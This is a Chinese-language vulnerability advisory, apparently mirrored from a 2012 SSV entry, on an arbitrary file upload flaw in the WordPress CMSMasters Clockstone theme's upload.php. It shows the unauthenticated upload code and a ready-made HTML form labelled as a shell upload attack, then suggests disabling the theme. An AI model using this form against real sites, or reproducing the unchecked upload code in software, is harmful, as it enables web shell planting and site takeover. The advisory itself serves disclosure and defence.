zoukankan      html  css  js  c++  java
  • WordPress 多个CMSMasters主题'upload.php'任意文件上传漏洞

    SSV-AppDir: WordPress漏洞
    发布时间: 2012-12-19 (GMT+0800)

    漏洞版本:

    cmsmasters Clockstone

    漏洞描述:

    BUGTRAQ  ID: 56988
    Clockstone是Wordpress的终极主题,一个单一的主题内集合了众多功能。
    WordPress的Clockstone主题和其他主题存在文件上传漏洞。存在该漏洞的原因是由于问题代码对已登录的用户没有进行身份验证操作。攻击者可通过上传任意文件到受害者站点,进而获取站点的访问权限。
    
    主题内有漏洞的代码:
    <?php
       if ($_POST['url']){ $uploaddir = $_POST['url']; }
       $first_filename = $_FILES['uploadfile']['name'];
       $filename = md5($first_filename);
       $ext = substr($first_filename, 1 + strrpos($first_filename, '.'));
       $file = $uploaddir . basename($filename.'.'.$ext);
       if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file)){
           echo basename($filename.'.'.$ext);
       } else {
           echo 'error';
       }
    ?>

     <* 参考

    测试方法:

    程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    Shell upload attack:<br />
       <form enctype="multipart/form-data" action="http://www.examplesite.com/wp-content/themes/clockstone/theme/functions/upload.php" method="post">
       <input type="text" name="url" value="./" /><br />
       Please choose a file: <input name="uploadfile" type="file" /><br />
       <input type="submit" value="Upload" />
       </form>

    安全建议:

    临时解决方法:
    
    如果您不能立刻安装补丁或者升级,建议您采取以下措施以降低威胁:
    
    * 禁用CMSMasters主题
    
  • 相关阅读:
    洛谷 P2896 [USACO08FEB]Eating Together S
    洛谷 P1564 膜拜
    洛谷 P1684 考验
    洛谷 P2031 脑力达人之分割字串
    洛谷 P2725 邮票 Stamps
    洛谷 P2904 [USACO08MAR]跨河River Crossing
    洛谷 P1929 迷之阶梯
    洛谷 P2375 [NOI2014]动物园
    谷歌浏览器禁止表单自动填充
    SQL数据同步之发布订阅
  • 原文地址:https://www.cnblogs.com/security4399/p/2836478.html
Copyright © 2011-2022 走看看